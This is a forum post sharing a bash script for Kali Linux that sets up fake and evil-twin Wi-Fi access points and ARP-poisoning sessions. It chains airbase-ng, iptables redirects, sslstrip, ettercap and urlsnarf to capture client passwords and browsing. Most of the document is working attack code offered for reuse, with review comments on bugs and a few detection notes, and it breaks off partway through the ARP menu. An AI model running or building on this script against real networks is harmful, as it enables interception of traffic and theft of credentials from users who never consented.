
Author Topic: em3rgency 911_AP Script  (Read 2560 times)

satix

  • Guest
em3rgency 911_AP Script
« on: May 28, 2015, 12:17:26 PM »
I have made a few changes to the script and would like support and feedback to get it properly tweaked: using isc-dhcp-server and working solidly on Kali. I feel a very solid FakeAP script would be useful for many of us.

Looking forward to the collaboration on it, Credit to em3rgency & N1t0g3n for what's here

Code: [Select]
#!/bin/bash
# updated mar 4th 2015
# script coded by em3rgency
# script updated by crypiehef to work with Kali Linux
# 911_AP version 1.1 (kali)
# xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
# This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
# Also includes workin ARP poisoning features.
# Tested and working on kali Linux, Needs to have version 1.3 of dhcp3-server to work correctly
# Works with ISC DHCP Server now. Readme needs to be updated with ISC config instructions.

# Colour palette read from terminfo: bold red, bold green, bold cyan, plus the
# attribute reset. The values are raw terminal escape sequences.
STAND="$(tput sgr0)"
RED="$(tput setaf 1 && tput bold)"
GREEN="$(tput setaf 2 && tput bold)"
BLUE="$(tput setaf 6 && tput bold)"

# Splash banner, left on screen for three seconds before the menu replaces it.
printf '\n\n\n'
printf '%s\n' \
  "${RED}              +############################################+" \
  "${RED}              +    em3rgency's Fake AP SSL MITM script     +" \
  "${RED}              +                                            +" \
  "${RED}              +                Version 1.1                 +" \
  "${RED}              +                                            +" \
  "${RED}              +           www.em3rgency.com                +" \
  "${RED}              +############################################+" \
  "" \
  "${BLUE}     Visit http://www.em3rgency.com for updates to this script. Thanks" \
  "" \
  ""
sleep 3
clear

# Main menu. Every entry is handled by the if/else chain that follows this block.
printf '%s\n' \
  "${BLUE}                    em3rgency's MITM script Version 1.1 !" \
  "" \
  "${RED}              ************************************************" \
  "${RED}              *    1.  Prerequsites and Updates              *" \
  "${RED}              *    2.  Run FAKE AP Static                    *" \
  "${RED}              *    3.  Run EVIL TWIN AP                      *" \
  "${RED}              *    4.  Run Standard ARP poison               *" \
  "${RED}              *    5.  Netdiscover connected clients         *" \
  "${RED}              *    6.  EXIT                                  *" \
  "${RED}              ************************************************" \
  "" \
  "${BLUE}                          Select Menu Option:"

# The answer stays in $menuoption for the dispatch chain below.
read menuoption
if [ $menuoption = "1" ]; then
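clear
echo ""
# Prerequisites submenu: package maintenance and config editing on the
# operator's own machine. Nothing in this branch touches the network setup.
echo "${RED}                   **************************************"
echo "${RED}                   *    1.  Run apt-get update          *"
echo "${RED}                   *    2.  Run apt-get upgrade         *"
echo "${RED}                   *    3.  Distribution upgrade        *"
echo "${RED}                   *    4.  Edit etter.conf             *"
echo "${RED}                   *    5.  Edit DHCP tunnel interface  *"
echo "${RED}                   *    6.  Install Dhcp3-server        *"
# Label corrected: airodump-ng-oui-update refreshes the MAC-vendor (OUI) list,
# it does not update aircrack-ng.
echo "${RED}                   *    7.  Update OUI vendor list      *"
echo "${RED}                   *    8.  Return to Main Menu         *"
echo "${RED}                   **************************************"

echo "${BLUE}                           Select Menu Option:${STAND}"
# -r keeps backslashes literal. This overwrites the main-menu answer, which is
# no longer needed once this branch has been entered.
read -r menuoption

# Quoting the selector means an empty answer simply matches no numbered entry
# instead of producing a "[: =: unary operator expected" error per test.
case "$menuoption" in
  1)
    # Refresh the package index.
    sudo apt-get update
    clear
    ./911_AP.sh
    ;;
  2)
    # Install newer versions of the packages already present.
    sudo apt-get upgrade
    clear
    ./911_AP.sh
    ;;
  3)
    # Distribution upgrade (may add or remove packages).
    sudo apt-get dist-upgrade
    clear
    ./911_AP.sh
    ;;
  4)
    # Open ettercap's configuration in a graphical editor.
    leafpad /etc/ettercap/etter.conf
    clear
    ./911_AP.sh
    ;;
  5)
    # Edit the interface list the ISC DHCP server is bound to.
    nano /etc/default/isc-dhcp-server
    clear
    ./911_AP.sh
    ;;
  6)
    # Now run through sudo like every other apt-get call in this menu.
    # NOTE(review): the file header says the script works with ISC DHCP Server
    # now; confirm dhcp3-server is still the package that is wanted here.
    sudo apt-get install dhcp3-server
    clear
    ./911_AP.sh
    ;;
  7)
    # Refresh the OUI list only. As in the original, this entry does not
    # relaunch the menu afterwards.
    sudo airodump-ng-oui-update
    clear
    ;;
  8)
    # Back to the main menu. ./911_AP.sh is resolved against the current
    # directory, so the script has to be started from its own directory.
    ./911_AP.sh
    ;;
  *)
    printf 'Invalid option: %s\n' "$menuoption" >&2
    ;;
esac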
else

if [ $menuoption = "2" ]; then
# Option 2 (static fake AP), setup phase: collect the operator's answers, put
# the wireless card into monitor mode and write the DHCP configuration that is
# later served to clients of the fake AP.
sleep 2

# Configuring your Network interfaces
echo
echo $BLUE"                   [+] Lets get started shall we [+]"
echo $STAND""
echo ""
# Print the routes flagged UG so the gateway address can be read off the screen.
route -n -A inet | grep UG
echo ""
echo ""
# NOTE(review): none of the five answers below is validated. They are expanded
# unquoted further down (mkdir, airmon-ng, iptables, xterm), so whitespace or
# glob characters in an answer split or rewrite those command lines.
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
# Creates the session directory under /root (so the script expects to run as
# root). NOTE(review): $SESSION is unquoted; an answer containing "/" or ".."
# creates the directory somewhere other than directly below /root.
mkdir -p /root/$SESSION
clear

echo $BLUE"              Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
# Keep the physical interface name in $fakeap; from here on $fakeap_interface
# means the monitor interface.
fakeap=$fakeap_interface
# NOTE(review): the monitor interface name is hard-coded rather than taken from
# airmon-ng's output. Newer aircrack-ng releases name it <iface>mon, so confirm
# that mon0 exists on the target system.
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation.
# Clients receive leases 10.0.0.30-10.0.0.60, with 10.0.0.1 as router and DNS
# server and the ESSID as domain name; those values are what a client-side
# investigation of this setup would see.
# NOTE(review): the quote before \"$ESSID\" closes the outer string, so $ESSID
# is expanded unquoted (word splitting and globbing apply) and nothing escapes
# quotes, semicolons or newlines in it; the answer can alter the generated file.
mkdir -p "/var/run/dhcpd"
echo "authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}" > /var/run/dhcpd/dhcpd.conf

# Option 2, launch phase. Each helper runs in its own background xterm and the
# job's PID is kept for the teardown. $! is the PID of the xterm (or of sudo,
# where the window is started through sudo), not of the tool inside it.

# FAKEAP setup: access point on channel 1 advertising the typed ESSID.
echo $BLUE"             Configuring and Starting your FAKE Access Point...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo $BLUE"                     Configuring your IP tables...."
ifconfig lo up
# at0 is configured here as the client-facing interface (10.0.0.1/24).
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# NOTE(review): these four commands remove every rule and user-defined chain in
# the filter and nat tables, including any firewall the host had before the
# script ran. Nothing is saved first, so it cannot be restored at cleanup.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Turns the host into a router. The previous value is not recorded; cleanup
# writes 0 unconditionally.
echo 1 > /proc/sys/net/ipv4/ip_forward
# DNATs every UDP packet seen in PREROUTING to the typed gateway: no port or
# interface match, so this covers far more than DNS.
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
# Only TCP port 80 is redirected to local port 10000. Connections that start on
# 443 are forwarded untouched, so clients that enforce HTTPS are not affected
# by this rule.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP: serve the generated configuration on at0, in the foreground of its xterm.
echo $BLUE"              Setting up DHCP to work with $ESSID...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
# NOTE(review): no explicit listen-port option is passed; the trailing 10000
# follows -k. Confirm the tool really listens on the port the REDIRECT targets.
echo $BLUE"            Starting SSLstrip to enumerate user credentials...."
sudo xterm  -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap on at0. xterm's -l/-lf options log the window output to a
# timestamped file under /root/$SESSION; that file is plain text and will hold
# whatever credentials scroll past.
echo $BLUE"               Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf on the uplink interface, logged the same way.
echo $BLUE"          Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# Follow sslstrip.log in its own window.
# NOTE(review): sslstrip.log is a relative path, resolved against the directory
# the script was started from; tail fails if the log is written elsewhere.
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

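clear
echo
echo "${RED}    ####################################################################"
echo "${RED}    [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo "${RED}    [                                                                  ]"
echo "${RED}    [     Press Y then ENTERKEY to close kill and clean up the script  ]"
echo "${RED}    [                                                                  ]"
echo "${RED}    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo "${RED}    ####################################################################"
echo ""
echo ""
# The answer is only compared, never executed; -r keeps backslashes literal.
read -r WISH

# Teardown: stop every helper window, leave monitor mode and switch routing
# off again. The banner asks for "Y", so both cases are accepted; the original
# matched lowercase "y" only and skipped the whole teardown on "Y", leaving the
# access point, IP forwarding and NAT rules active. An empty answer no longer
# raises a test syntax error.
case "$WISH" in
  [Yy])
    echo
    echo "${BLUE}                           Cleaning up your mess${STAND}"
    echo ''
    sleep 2

    # Signal each helper that was actually started. The original also ran
    # kill on dritnetid, which this script never assigns, so kill was called
    # without a PID; that call is dropped.
    for helper_pid in "${fakeapid:-}" "${dhcpid:-}" "${sslstripid:-}" \
      "${ettercapid:-}" "${urlsnarfid:-}" "${sslstriplogid:-}"; do
      if [ -n "$helper_pid" ]; then
        kill "$helper_pid"
      fi
    done

    # Monitor interface first, then the physical card.
    airmon-ng stop "$fakeap_interface"
    airmon-ng stop "$fakeap"
    echo "0" > /proc/sys/net/ipv4/ip_forward
    # NOTE(review): this empties the filter and nat tables completely. Rules
    # the host had before the session were already flushed at setup and are
    # not restored here; reload the host firewall afterwards.
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    clear
    echo ""
    echo ""
    echo "${RED}             [+][+][+]     Everything is now cleaned up    [+][+][+]"
    echo "${RED}             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
    echo "${RED}             [+][+][+]          Coded by em3rgency         [+][+][+]"
    sleep 5
    exit
    ;;
esac

# Any other answer: nothing has been stopped, and the menu is relaunched with
# the helpers, forwarding and NAT rules still in place.
sleep 3
clear

./911_AP.sh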
else

# This command will RUN The EVIL TWIN AP attack
if [ $menuoption = "3" ]; then
# Option 3 (evil twin AP), setup phase: collect the operator's answers, put the
# wireless card into monitor mode and write the DHCP configuration that is
# later served to clients of the AP.
sleep 3

# Configuring your Network interfaces
echo
echo $BLUE"                       [+] Lets get started shall we [+]"$STAND
echo ""
echo ""
# Print the routes flagged UG so the gateway address can be read off the screen.
route -n -A inet | grep UG
echo ""
echo ""
echo ""
# NOTE(review): none of the five answers below is validated. They are expanded
# unquoted further down (mkdir, airmon-ng, iptables, xterm), so whitespace or
# glob characters in an answer split or rewrite those command lines.
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
clear
# Session directory under /root (so the script expects to run as root).
# NOTE(review): $SESSION is unquoted; an answer containing "/" or ".." creates
# the directory somewhere other than directly below /root.
mkdir -p /root/$SESSION
clear

echo $BLUE"               Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
# Keep the physical interface name in $fakeap; from here on $fakeap_interface
# means the monitor interface.
fakeap=$fakeap_interface
# NOTE(review): the monitor interface name is hard-coded rather than taken from
# airmon-ng's output. Newer aircrack-ng releases name it <iface>mon, so confirm
# that mon0 exists on the target system.
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation.
# Clients receive leases 10.0.0.30-10.0.0.60, with 10.0.0.1 as router and DNS
# server and the ESSID as domain name; those values are what a client-side
# investigation of this setup would see.
# NOTE(review): the quote before \"$ESSID\" closes the outer string, so $ESSID
# is expanded unquoted (word splitting and globbing apply) and nothing escapes
# quotes, semicolons or newlines in it; the answer can alter the generated file.
mkdir -p "/var/run/dhcpd"
echo "authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}" > /var/run/dhcpd/dhcpd.conf

# Option 3, launch phase. Each helper runs in its own background xterm and the
# job's PID is kept for the teardown. $! is the PID of the xterm (or of sudo,
# where the window is started through sudo), not of the tool inside it.

# FAKEAP setup. The only difference from the static option is the extra
# "-P -C 60" passed to airbase-ng.
# NOTE(review): per the airbase-ng documentation these make the AP answer probe
# requests for other network names as well; confirm against the installed
# version. Clients set to auto-join remembered open networks are the exposed
# ones, which is why disabling auto-join is the usual client-side mitigation.
echo $BLUE"                     Configuring and Starting $ESSID...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo "                          Configuring your IP tables...."
ifconfig lo up
# at0 is configured here as the client-facing interface (10.0.0.1/24).
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# NOTE(review): these four commands remove every rule and user-defined chain in
# the filter and nat tables, including any firewall the host had before the
# script ran. Nothing is saved first, so it cannot be restored at cleanup.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Turns the host into a router. The previous value is not recorded; cleanup
# writes 0 unconditionally.
echo 1 > /proc/sys/net/ipv4/ip_forward
# DNATs every UDP packet seen in PREROUTING to the typed gateway: no port or
# interface match, so this covers far more than DNS.
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
# Only TCP port 80 is redirected to local port 10000. Connections that start on
# 443 are forwarded untouched, so clients that enforce HTTPS are not affected
# by this rule.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP: serve the generated configuration on at0, in the foreground of its xterm.
echo "                   Setting up DHCP to work with EVIL TWIN AP...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
# NOTE(review): no explicit listen-port option is passed; the trailing 10000
# follows -k. Confirm the tool really listens on the port the REDIRECT targets.
echo "               Starting SSLstrip to enumerate user credentials...."
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap on at0. xterm's -l/-lf options log the window output to a
# timestamped file under /root/$SESSION; that file is plain text and will hold
# whatever credentials scroll past.
echo "                 Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf on the uplink interface, logged the same way.
echo "            Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# Follow sslstrip.log in its own window.
# NOTE(review): sslstrip.log is a relative path, resolved against the directory
# the script was started from; tail fails if the log is written elsewhere.
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

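clear
echo
echo "${RED}     ####################################################################"
echo "${RED}     [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo "${RED}     [                                                                  ]"
echo "${RED}     [    Press Y then ENTERKEY to close kill and clean up the script   ]"
echo "${RED}     [                                                                  ]"
echo "${RED}     [             IF not closed properly ERRORS WILL OCCUR             ]"
echo "${RED}     ####################################################################"
echo "${STAND}"
echo ""
# The answer is only compared, never executed; -r keeps backslashes literal.
read -r WISH

# Teardown: stop every helper window, leave monitor mode and switch routing
# off again. The banner asks for "Y", so both cases are accepted; the original
# matched lowercase "y" only and skipped the whole teardown on "Y", leaving the
# access point, IP forwarding and NAT rules active. An empty answer no longer
# raises a test syntax error.
case "$WISH" in
  [Yy])
    echo
    echo "${BLUE}                           Cleaning up your mess"
    echo ''
    sleep 2

    # Signal each helper that was actually started. The original also ran
    # kill on dritnetid, which this script never assigns, so kill was called
    # without a PID; that call is dropped.
    for helper_pid in "${fakeapid:-}" "${dhcpid:-}" "${sslstripid:-}" \
      "${ettercapid:-}" "${urlsnarfid:-}" "${sslstriplogid:-}"; do
      if [ -n "$helper_pid" ]; then
        kill "$helper_pid"
      fi
    done

    # Monitor interface first, then the physical card.
    airmon-ng stop "$fakeap_interface"
    airmon-ng stop "$fakeap"
    echo "0" > /proc/sys/net/ipv4/ip_forward
    # NOTE(review): this empties the filter and nat tables completely. Rules
    # the host had before the session were already flushed at setup and are
    # not restored here; reload the host firewall afterwards.
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    clear
    echo ""
    echo ""
    echo "${RED}             [+][+][+]     Everything is now cleaned up    [+][+][+]"
    echo "${RED}             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
    echo "${RED}             [+][+][+]          Coded by em3rgency         [+][+][+]${STAND}"
    sleep 5
    ;;
esac

# Unlike the static-AP branch there is no exit after cleanup: the menu is
# relaunched either way. After any answer other than Y/y the helpers,
# forwarding and NAT rules are still in place at that point.
sleep 3
clear
./911_AP.sh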
else

# Credits to N1t0g3n for the base to this section. Thanks bro
if [ $menuoption = "4" ]; then
# Option 4 (ARP poisoning), shared setup: list the interfaces, ask which ones to
# use and where to log, then show the ARP submenu.
clear
echo ""
echo ""
echo $BLUE"                  Finding wireless and ethernet interfaces."$STAND
sleep 3
echo ""
# First column of ifconfig output, blank lines dropped.
# NOTE(review): egrep -v 'lo|vm' hides every name that merely contains "lo" or
# "vm" (e.g. wlo1), not only the loopback and VM interfaces.
ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
echo ""
echo ""
# NOTE(review): the answers below are not validated and are expanded unquoted
# in the sub-branches (mkdir, urlsnarf, ettercap command lines).
echo "Please type the name of your wireless interface (wlan0): "
read WIFACE
sleep 2
echo ""
echo ""
echo "Please type the name of your ethernet interface (eth0): "
read ETH0
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION

# Session directory under /root. NOTE(review): $SESSION is unquoted; an answer
# containing "/" or ".." creates the directory elsewhere.
mkdir -p /root/$SESSION
clear
echo ""
echo ""
clear
echo $RED"              **************************************************";
echo $RED"              *    1.  Attack entire Gateway through LAN       *";
echo $RED"              *    2.  Attack entire Gateway through Wireless  *";
echo $RED"              *    3.  Attack single host through LAN          *";
echo $RED"              *    4.  Attack single host through Wireless     *";
echo $RED"              *    5.  Return to Main Menu                     *";
echo $RED"              **************************************************";
echo $STAND""
echo ""
echo $BLUE"                           Select Menu Option: "
# Overwrites the main-menu answer; the tests that follow compare the submenu value.
read menuoption
if [ $menuoption = "1" ]; then
# ARP submenu option 1: gateway-wide session on the wired interface ($ETH0).
echo
echo
echo "                This should be your Gateway from what I see: "
echo ""
echo ""
# Print the routes flagged UG so the gateway address can be read off the screen.
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your Gateway in below: "$STAND
# NOTE(review): not validated; expanded unquoted into the ettercap target below.
read GATEWAY
echo $BLUE"                         Starting attack on Gateway"
echo ""
echo ""
echo "                   Passwords will show up in ettercap window"
sleep 3
# Enable routing on this host; the previous value is not recorded.
echo "1" > /proc/sys/net/ipv4/ip_forward

#  PORT redirection: only TCP port 80 goes to local port 10000; traffic that
#  starts on 443 is untouched.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# URLSnarf. xterm's -l/-lf options log the window output to a timestamped file
# under /root/$SESSION. No PID is kept for any window in this branch.
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf  -i $ETH0 &
sleep 2

# Ettercap in ARP mode: first target is the typed gateway, second is left empty.
# Detection side: this shows up as unsolicited ARP replies re-mapping the
# gateway address, which ARP monitoring or switch-level ARP inspection flags.
xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
# NOTE(review): no explicit listen-port option is passed; the trailing 10000
# follows -k. Confirm the tool really listens on the port the REDIRECT targets.
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
sleep 2

# Follow sslstrip.log. NOTE(review): relative path, resolved against the
# directory the script was started from.
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
# Any input ends the session; the value itself is not used.
read ENTERKEY

# Teardown by process name.
# NOTE(review): killall xterm also closes xterm windows that have nothing to do
# with this script.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
# NOTE(review): removes every rule and user-defined chain in the filter and nat
# tables, not just the single REDIRECT added above; pre-existing host firewall
# rules are lost and have to be reloaded by hand.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "2" ]; then
# ARP submenu option 2: gateway-wide session on the wireless interface ($WIFACE).
echo $BLUE"              This should be your gateway from what I see: "$STAND
echo ""
echo ""
# Print the routes flagged UG so the gateway address can be read off the screen.
route -n -A inet | grep UG
echo ""
echo ""
echo $BLUE"Please type the IP of your gateway: "$STAND
# NOTE(review): not validated; expanded unquoted into the ettercap target below.
read GATEWAY
echo $BLUE"                      Starting attack on gateway"
echo ""
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

# Enable routing on this host; the previous value is not recorded.
echo "1" > /proc/sys/net/ipv4/ip_forward

# URLSnarf. xterm's -l/-lf options log the window output to a timestamped file
# under /root/$SESSION. No PID is kept for any window in this branch.
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection: only TCP port 80 goes to local port 10000; traffic that
# starts on 443 is untouched.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap in ARP mode: first target is the typed gateway, second is left empty.
# Detection side: this shows up as unsolicited ARP replies re-mapping the
# gateway address, which ARP monitoring or switch-level ARP inspection flags.
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
# NOTE(review): no explicit listen-port option is passed; the trailing 10000
# follows -k. Confirm the tool really listens on the port the REDIRECT targets.
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# Follow sslstrip.log. NOTE(review): relative path, resolved against the
# directory the script was started from.
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
# Any input ends the session; the value itself is not used.
read ENTERKEY

# Teardown by process name.
# NOTE(review): killall xterm also closes xterm windows that have nothing to do
# with this script.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
# NOTE(review): removes every rule and user-defined chain in the filter and nat
# tables, not just the single REDIRECT added above; pre-existing host firewall
# rules are lost and have to be reloaded by hand.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "3" ]; then
# ARP submenu option 3: single-host session on the wired interface ($ETH0).
echo ""
echo ""
echo $BLUE"              This should be your gateway from what I see: "
echo ""
echo ""
# Print the routes flagged UG so the gateway address can be read off the screen.
route -n -A inet | grep UG
echo ""
echo ""
# NOTE(review): neither address is validated; both are expanded unquoted into
# the ettercap targets below.
echo $STAND"Please type the IP of your gateway: "
read GATEWAY3
echo ""
echo ""
echo "Please type the IP of the target host: "
read HOST3
echo ""
echo $BLUE"                      Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

# Enable routing on this host; the previous value is not recorded.
echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf. xterm's -l/-lf options log the window output to a timestamped file
# under /root/$SESSION. No PID is kept for any window in this branch.
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
sleep 2

# Port redirection: only TCP port 80 goes to local port 10000; traffic that
# starts on 443 is untouched.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap in ARP mode between the typed gateway and the typed host.
# NOTE(review): unlike the other three sub-branches no -i option is passed, so
# $ETH0 is not used here and the tool picks its own interface; the method name
# is also spelled in upper case only in this branch. Confirm both are intended.
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
sleep 2

# SSLstrip
# NOTE(review): no explicit listen-port option is passed; the trailing 10000
# follows -k. Confirm the tool really listens on the port the REDIRECT targets.
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# Follow sslstrip.log. NOTE(review): relative path, resolved against the
# directory the script was started from.
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
